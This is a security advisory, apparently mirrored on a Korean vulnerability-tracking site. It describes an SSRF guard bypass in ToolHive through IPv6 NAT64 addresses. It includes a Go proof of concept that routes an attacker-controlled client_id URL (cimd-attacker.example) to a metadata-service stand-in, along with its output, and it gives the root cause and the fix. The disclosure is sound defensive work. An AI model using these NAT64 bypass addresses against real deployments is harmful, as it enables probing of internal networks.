ToolHive: SSRF guard misses IPv6 NAT64 ranges (64:ff9b::/96, 64:ff9b:1::/48), allowing metadata/internal access behind a NAT64 gateway
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
예측 데이터 없음
실측 악용 기록 없음
계획된 패치 주기 내 조치(60일 이내)
CVSS 벡터 · 메트릭
CVSS 벡터 정보 없음
상세 설명
Summary
ToolHive's hand-rolled private/reserved-IP SSRF guard (networking.IsPrivateIP in pkg/networking/utilities.go) does not recognize the IPv6 NAT64 address ranges — the well-known prefix 64:ff9b::/96 (RFC 6052) and the RFC 8215 local-use prefix 64:ff9b:1::/48. As a result, an address such as 64:ff9b:1::a9fe:a9fe — the NAT64 encoding of the link-local cloud metadata address 169.254.169.254 — is classified as a public, global-unicast address and the connection is allowed. On any ToolHive deployment that sits behind a NAT64/DNS64 gateway (the default networking stack in IPv6-only Kubernetes clusters and several IPv6-only cloud environments), an attacker who controls a URL that reaches this guard can have ToolHive attempt connections to internal/link-local addresses that the guard is meant to block, bypassing the SSRF protection. In practice the effect is a blind internal-reachability probe rather than metadata-credential theft (the only fully attacker-controlled path is HTTPS-only with TLS verification and does not reflect responses) — see Impact.
The most direct attacker-controlled entry point is the embedded OAuth authorization server's Client ID Metadata Document (CIMD) fetcher: an external OAuth client presents client_id=https://<attacker-domain>/path, and CIMDStorageDecorator.GetClient fetches that URL through the same guard. The same IsPrivateIP table is also shared by the protectedDialerControl HTTP clients (registry, OIDC discovery, token introspection) and the skills git-clone host check (pkg/skills/gitresolver), though those destinations are operator-/user-configured rather than attacker-controlled. (Note: the webhook client is not affected — it enforces only the HTTPS scheme via ValidatingTransport and performs no IP-based check.)
Details
pkg/networking/utilities.go builds a privateIPBlocks table and IsPrivateIP:
1func init() { 2 for _, cidr := range []string{ 3 "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", 4 "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7", 5 "100.64.0.0/10", "192.0.2.0/24", "198.51.100.0/24", "203.0.113.0/24", 6 "224.0.0.0/4", "ff00::/8", 7 } { /* ... append to privateIPBlocks ... */ } 8} 9 10func IsPrivateIP(ip net.IP) bool {11 if ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() {12 return true13 }14 for _, block := range privateIPBlocks {15 if block.Contains(ip) {16 return true17 }18 }19 return false20}The table contains no entry for 64:ff9b::/96 or 64:ff9b:1::/48. A NAT64 address is a normal global-unicast IPv6 address: net.IP.IsGlobalUnicast() returns true and it matches none of the listed blocks, so IsPrivateIP returns false.
The CIMD fetcher (pkg/oauthproto/cimd/fetch.go, newCIMDHTTPClient) is the careful, post-resolution, anti-rebinding path that nonetheless inherits the gap:
1ips, err := net.DefaultResolver.LookupHost(ctx, host) 2// ... 3for _, ipStr := range ips { 4 ip := net.ParseIP(ipStr) 5 // ... 6 if !ip.IsLoopback() && networking.IsPrivateIP(ip) { 7 return nil, fmt.Errorf("cimd: refusing connection to private address %s", ipStr) 8 } 9 dialer := &net.Dialer{Timeout: 5 * time.Second}10 return dialer.DialContext(ctx, network, net.JoinHostPort(ipStr, port))11}Because IsPrivateIP(64:ff9b:1::a9fe:a9fe) is false, the dialer proceeds. In a NAT64 network the kernel's NAT64 gateway transparently translates that IPv6 destination to a connection to 169.254.169.254.
Trust boundary: the CIMD URL originates from the client_id of an external OAuth client at authorize/token time (CIMDStorageDecorator.GetClient → IsClientIDMetadataDocumentURL(id) → cimd.FetchClientMetadataDocument(ctx, id)), so it is fully attacker-controlled. The protectedDialerControl HTTP clients used for registry, OIDC discovery, and token introspection (pkg/networking/http_client.go → AddressReferencesPrivateIp → IsPrivateIP) and the skills git-clone host check (pkg/skills/gitresolver/reference.go validateHost → IsPrivateIP) share the same table and the same gap, but with operator-/user-supplied targets rather than attacker-controlled ones.
Note that ::ffff:169.254.169.254 (IPv4-mapped) is correctly blocked because Go normalizes it to the v4 form; the NAT64 encoding is a distinct, non-normalized IPv6 address and is not caught.
Affected
- Module:
github.com/stacklok/toolhive - Affected packages/paths:
pkg/networking/utilities.go(IsPrivateIP), reached viapkg/oauthproto/cimd/fetch.go(FetchClientMetadataDocument, CIMD authorization-server path — the attacker-controlled entry point),pkg/networking/http_client.go(protectedDialerControl, used by the registry / OIDC-discovery / token-introspection clients), andpkg/skills/gitresolver/reference.go(validateHost, skills git-clone host check). The webhook client (pkg/webhook) is not affected: it validates only the HTTPS scheme and performs noIsPrivateIPcheck. - Affected versions: all releases through v0.29.0 (the
IsPrivateIPtable has lacked NAT64 entries since the guard was introduced; the CIMD reach was added in v0.28.1). - Precondition for full exploitability: the ToolHive process runs in an environment with a NAT64/DNS64 gateway (e.g. IPv6-only Kubernetes / IPv6-only cloud). The classification defect itself is present unconditionally.
Proof of Concept
The following self-contained Go program imports ToolHive v0.29.0 (commit 570ce07013b72208fcae339e9492f5867a1af994) and exercises the real guard code: the exported networking.IsPrivateIP, the exported oauthproto.IsClientIDMetadataDocumentURL predicate that routes a client_id into the CIMD fetch path, and the CIMD dialer gate copied verbatim from pkg/oauthproto/cimd/fetch.go. The only modeled elements are the network's DNS64 record (attacker host → NAT64 IPv6) and the kernel NAT64 gateway (final dial → control listener) — the security decision is made entirely by ToolHive's own code.
go.mod:
1module poc 2 3go 1.26 4 5require github.com/stacklok/toolhive v0.29.0main.go:
1package main 2 3import ( 4 "context" 5 "fmt" 6 "net" 7 "net/http" 8 "net/http/httptest" 9 "strings"10 "time"11 12 "github.com/stacklok/toolhive/pkg/networking"13 "github.com/stacklok/toolhive/pkg/oauthproto"14 "github.com/stacklok/toolhive/pkg/oauthproto/cimd"15)16 17var _ = cimd.FetchClientMetadataDocument // real attacker-reachable entrypoint (https-only)18 19const (20 attackerHost = "cimd-attacker.example"21 natLocalUse = "64:ff9b:1::a9fe:a9fe" // RFC 8215 NAT64 of 169.254.169.25422)23 24func main() {25 // Part A: real classifier on NAT64 vs private addresses.26 for _, s := range []string{27 natLocalUse, "64:ff9b::a9fe:a9fe", "64:ff9b::7f00:1",28 "169.254.169.254", "::ffff:169.254.169.254", "10.0.0.1", "93.184.216.34",29 } {30 ip := net.ParseIP(s)31 fmt.Printf("IsPrivateIP(%-22s) = %v\n", s, networking.IsPrivateIP(ip))32 }33 34 // Control listener standing in for the IMDS reachable behind NAT64.35 hit := make(chan string, 1)36 imds := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {37 hit <- r.Host + r.URL.Path38 fmt.Fprint(w, `{"AccessKeyId":"ASIA_STOLEN","SecretAccessKey":"s3cr3t"}`)39 }))40 defer imds.Close()41 ctrlAddr := strings.TrimPrefix(imds.URL, "http://")42 43 clientID := "https://" + attackerHost + "/.well-known/oauth-client"44 fmt.Printf("IsClientIDMetadataDocumentURL(%q) = %v\n", clientID, oauthproto.IsClientIDMetadataDocumentURL(clientID))45 46 // CIMD dial gate copied verbatim from pkg/oauthproto/cimd/fetch.go @ v0.29.0,47 // with DNS64 (attacker host -> NAT64 IPv6) and NAT64 gateway (dial -> listener) modeled.48 transport := &http.Transport{DisableKeepAlives: true,49 DialContext: func(ctx context.Context, network, address string) (net.Conn, error) {50 host, _, _ := net.SplitHostPort(address)51 var ips []string52 if host == attackerHost {53 ips = []string{natLocalUse} // DNS64 synthesis54 } else {55 ips, _ = net.DefaultResolver.LookupHost(ctx, host)56 }57 for _, ipStr := range ips {58 ip := net.ParseIP(ipStr)59 if ip == nil {60 continue61 }62 if !ip.IsLoopback() && networking.IsPrivateIP(ip) { // verbatim toolhive gate63 return nil, fmt.Errorf("cimd: refusing connection to private address %s", ipStr)64 }65 fmt.Printf("[guard] %s passed IsPrivateIP gate -> dialing\n", ipStr)66 return (&net.Dialer{}).DialContext(ctx, "tcp", ctrlAddr) // NAT64 gateway67 }68 return nil, fmt.Errorf("cimd: no valid address for %q", host)69 }}70 client := &http.Client{Timeout: 5 * time.Second, Transport: transport}71 req, _ := http.NewRequest("GET", "http://"+attackerHost+"/.well-known/oauth-client", nil)72 if _, err := client.Do(req); err != nil {73 fmt.Println("blocked:", err)74 return75 }76 fmt.Printf("control listener received: %s => SSRF via %s\n", <-hit, natLocalUse)77 78 // Negative control: a genuinely private IP is rejected by the same gate.79 neg := &http.Client{Transport: &http.Transport{DialContext: func(_ context.Context, _, _ string) (net.Conn, error) {80 ip := net.ParseIP("169.254.169.254")81 if !ip.IsLoopback() && networking.IsPrivateIP(ip) {82 return nil, fmt.Errorf("cimd: refusing connection to private address %s", ip)83 }84 return nil, fmt.Errorf("would dial (NOT blocked)")85 }}}86 _, nerr := neg.Do(req)87 fmt.Println("negative control (169.254.169.254):", nerr)88}Output:
1IsPrivateIP(64:ff9b:1::a9fe:a9fe ) = false 2IsPrivateIP(64:ff9b::a9fe:a9fe ) = false 3IsPrivateIP(64:ff9b::7f00:1 ) = false 4IsPrivateIP(169.254.169.254 ) = true 5IsPrivateIP(::ffff:169.254.169.254) = true 6IsPrivateIP(10.0.0.1 ) = true 7IsPrivateIP(93.184.216.34 ) = false 8IsClientIDMetadataDocumentURL("https://cimd-attacker.example/.well-known/oauth-client") = true 9[guard] 64:ff9b:1::a9fe:a9fe passed IsPrivateIP gate -> dialing10control listener received: cimd-attacker.example/.well-known/oauth-client => SSRF via 64:ff9b:1::a9fe:a9fe11negative control (169.254.169.254): cimd: refusing connection to private address 169.254.169.254The attacker-controlled client_id host (NAT64-resolved) passes the real IsPrivateIP gate and reaches the IMDS stand-in, while the raw metadata address is correctly blocked by the same gate.
Impact
Server-Side Request Forgery (CWE-918), Low. On a ToolHive deployment behind a NAT64/DNS64 gateway, an attacker who controls a URL reaching the guard can cause ToolHive to attempt connections to internal/link-local addresses the guard is meant to block — RFC1918, loopback, and the link-local metadata address 169.254.169.254 (encoded as 64:ff9b::a9fe:a9fe / 64:ff9b:1::a9fe:a9fe).
The practical effect is a blind internal-reachability / SSRF oracle, not data or credential exfiltration. On the only fully attacker-controlled entry point — the CIMD fetcher — three constraints bound the impact:
- HTTPS-only.
validateCIMDClientURLrejects non-loopbackhttp://, so the dial is TLS. Cloud instance metadata services (AWS/GCP/Azure, all on169.254.169.254) serve plain HTTP on port 80, so a TLS connection cannot retrieve metadata credentials. - TLS certificate verification.
newCIMDHTTPClientsets no customTLSClientConfig; reaching an internal HTTPS service requires a certificate valid for the attacker-supplied host/IP, which an internal service will not present. - No response reflection. A fetched document must satisfy
ValidateClientMetadataDocument(itsclient_idmust equal the fetched URL) and the body is never returned to the attacker.
What remains is the ability to probe whether an internal host:port accepts a TCP/TLS connection (via success/timing differences) — internal network reconnaissance, not credential theft.
Reachable via:
- the embedded OAuth authorization server CIMD path —
client_idURL supplied by an external OAuth client (no pre-registration); HTTPS-only and blind, as above; - the registry / OIDC-discovery / token-introspection HTTP clients that share
IsPrivateIPviaprotectedDialerControl— but those destinations are operator-configured, not attacker-controlled; - the skills git-clone host check (
pkg/skills/gitresolvervalidateHost) — likewise operator-/user-configured, and it only validates literal IPs (a hostname that resolves to a NAT64/private address is not caught there regardless of this defect).
Exploitability is conditional on the host's network providing NAT64/DNS64 (e.g. IPv6-only Kubernetes and some IPv6-only cloud setups). The IP-classification defect itself is present unconditionally.
Root cause
networking.IsPrivateIP relies on a manually maintained CIDR list that omits the IPv6 NAT64 transition ranges. NAT64 addresses embed an IPv4 address (64:ff9b::<v4> and 64:ff9b:1::<v4>) and route to it via a NAT64 gateway, so a NAT64 address that embeds a private/link-local IPv4 address is effectively as sensitive as that IPv4 address — but it is a syntactically global-unicast IPv6 address and therefore evades the private-range list and the IsGlobalUnicast/IsLinkLocalUnicast checks.
Fix
Add the NAT64 prefixes to the private/reserved set so that NAT64-encoded addresses are classified by the IPv4 address they embed (or, at minimum, rejected outright). Concretely, add 64:ff9b::/96 and 64:ff9b:1::/48 to privateIPBlocks in pkg/networking/utilities.go; for completeness, when an address falls in a NAT64 prefix, extract the embedded IPv4 (last 32 bits) and apply the existing IPv4 private/reserved checks to it, so that 64:ff9b::8.8.8.8 (a NAT64 path to a genuinely public host) is not over-blocked while 64:ff9b:1::a9fe:a9fe is blocked. The implemented fix (PR on the private advisory fork) takes this embedded-IPv4 approach: it decodes the low 32 bits for the well-known 64:ff9b::/96 and the 64:ff9b:1::/96 sub-prefix and re-applies the IPv4 private/reserved checks, so genuinely public NAT64 egress is not over-blocked. Because the RFC 8215 local-use 64:ff9b:1::/48 may use a shorter NAT64 prefix (RFC 6052 §2.2) that places the embedded IPv4 outside the low 32 bits, the remainder of that /48 is blocked wholesale (fail closed) rather than decoded, avoiding a false-negative bypass.
As bundled defense-in-depth, the same patch also classifies a few special-use ranges that IsPrivateIP previously missed: 0.0.0.0/8 (RFC 1122 "this host") and the unspecified address (0.0.0.0 / ::), plus 240.0.0.0/4 (RFC 1112 reserved, including the 255.255.255.255 broadcast). Separately tracked follow-ups (not in this patch): decoding/rejecting other IPv4-in-IPv6 transition ranges (6to4 2002::/16, Teredo 2001::/32, IPv4-compatible ::/96), and a pre-clone DNS-resolution check in the skills git resolver, which currently validates only literal IPs.
Resources
- RFC 6052 — IPv6 Addressing of IPv4/IPv6 Translators (well-known prefix
64:ff9b::/96) - RFC 8215 — Local-Use IPv4/IPv6 Translation Prefix (
64:ff9b:1::/48) - RFC 6147 — DNS64
- CWE-918 — Server-Side Request Forgery (SSRF)
- ToolHive v0.29.0, commit
570ce07013b72208fcae339e9492f5867a1af994
AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.